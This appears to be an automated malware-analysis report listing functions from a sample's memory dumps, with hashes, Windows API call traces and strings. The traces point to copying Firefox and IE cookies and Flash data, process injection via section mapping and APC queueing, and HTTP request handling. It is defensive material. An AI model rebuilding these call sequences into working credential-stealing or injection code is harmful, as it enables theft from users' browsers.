  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DBD3F, Relevance: 10.7, APIs: 7, Instructions: 202 Total matches: 131native
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF422, Relevance: 10.6, APIs: 7, Instructions: 85 Total matches: 37registrylibraryloader
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C51AB, Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 438 Total matches: 26synchronizationmemorythread
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
